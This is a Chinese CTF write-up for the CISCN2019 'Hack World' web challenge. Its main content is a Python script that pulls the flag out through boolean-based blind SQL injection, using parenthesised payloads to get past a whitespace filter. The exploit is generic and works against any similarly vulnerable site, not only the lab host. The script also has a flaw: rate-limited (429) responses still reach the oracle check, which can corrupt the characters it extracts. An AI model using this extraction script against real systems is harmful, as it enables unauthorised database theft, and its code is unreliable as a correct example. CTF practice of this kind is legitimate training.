[CISCN2019 华北赛区 Day2 Web1]Hack World
知识点
- 布尔盲注
数字型布尔盲注，fuzz 一下，发现过滤了空格和一些常用的东西
用 Burp Suite fuzz 时得到提示：flag 在 flag 表的 flag 列中

#coding:utf-8
#二分搜索,区间左闭右开
import requests
import time

url = "http://90b6fa83-da9f-46ef-b585-b01631007685.node3.buuoj.cn"
res = ''

# Boolean-blind extraction of flag.flag, one character per outer iteration.
# The page acts as a one-bit oracle: id=1 renders "Hello", id=0 does not, and
# `1^(cond)` selects between the two depending on whether cond holds. The
# payload uses parentheses instead of spaces because the target filters
# whitespace (see the note above the script). From a monitoring standpoint
# this traffic is easy to spot: many POSTs to one endpoint whose bodies differ
# only in two integers, plus the 429s the rate limiter already emits.
for pos in range(1, 51):
    print(pos)
    # Half-open search interval [lo, hi) over printable ASCII.
    lo, hi = 31, 126
    mid = lo + ((hi - lo) >> 1)
    while lo < hi:
        payload = "1^(ascii(substr((select(flag)from(flag)),%d,1))>%d)" % (pos, mid)
        reply = requests.post(url=url, data={"id": payload})
        # A 429 is only logged and slept on; the throttled response still
        # reaches the oracle check below unchanged.
        if reply.status_code == 429:
            print('too fast')
            time.sleep(1)
        if "Hello" not in reply.text:
            # cond was true: the character is greater than mid.
            lo = mid + 1
        else:
            # cond was false: the character is at most mid.
            hi = mid
        mid = lo + ((hi - lo) >> 1)
    # lo == hi here, so mid is the resolved code point for this position.
    res += chr(mid)
    print(str(mid), res)
